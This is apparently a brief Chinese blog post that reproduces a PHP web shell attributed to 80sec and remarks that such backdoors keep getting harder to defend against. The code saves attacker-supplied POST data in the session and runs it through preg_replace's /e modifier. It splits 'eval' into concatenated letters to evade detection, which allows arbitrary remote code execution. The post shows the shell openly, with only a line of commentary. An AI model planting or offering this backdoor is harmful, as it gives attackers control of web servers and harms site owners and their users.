80sec里面的小马

session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

黑客果然是为了eval无所不作啊,现在的小马真的是越来越难防。


又学到了一招

你可能感兴趣的:(session)